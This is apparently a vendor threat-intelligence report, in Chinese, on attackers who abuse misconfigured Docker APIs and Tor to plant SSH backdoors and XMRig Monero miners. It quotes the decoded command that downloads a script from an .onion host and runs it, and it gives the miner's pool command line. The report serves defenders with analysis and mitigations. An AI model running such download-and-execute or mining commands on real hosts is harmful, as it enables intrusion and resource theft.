揭露利用Tor网络的Docker漏洞攻击链

关键发现

• 新型攻击结合Docker远程API与Tor匿名网络，在受害系统隐秘部署加密货币挖矿程序
• 攻击者利用配置不当的Docker API获取容器环境访问权限，通过Tor隐藏活动痕迹
• 主要攻击目标为云计算密集型行业：科技公司、金融服务机构和医疗组织
• 攻击工具链包含zstd压缩工具（基于ZStandard算法，以高压缩比和快速解压著称）

攻击流程分析

初始访问阶段

攻击始于对Docker Remote API的探测请求（源IP: 198.199.72.27），随后攻击者创建挂载宿主机根目录的Alpine容器，通过base64编码隐藏恶意命令：

# 解码后的攻击命令
sh -c curl --socks5-hostname tor:9050 -o /docker-init.sh http[:]//xxx.onion/static/docker-init.sh && chmod +x /docker-init.sh && /docker-init.sh

恶意脚本功能

1. SSH后门配置
   • 修改宿主机SSH配置允许root登录
   • 植入攻击者公钥实现持久化访问
2. 工具安装
   • 部署masscan端口扫描工具
   • 安装zstd压缩工具和torsocks代理工具
3. C2通信
   • 通过.onion域名向攻击者C2服务器回传系统信息
4. 有效载荷投递
   • 通过Tor网络下载Zstandard压缩的恶意二进制文件（system-linux-$(uname -m).zst）

挖矿程序部署

最终执行的XMRig矿工包含完整配置：

./system -o pool.moneroocean.stream:10128 -u 49... -p x -a rx/0

MITRE ATT&CK技术映射

防御建议

1. 严格配置Docker API访问权限，仅允许可信网络访问
2. 容器运行时禁止使用root权限
3. 定期审计容器镜像及运行实例
4. 启用Trend Vision One™威胁检测功能（提供相关IOC狩猎查询）

威胁指标(IOC)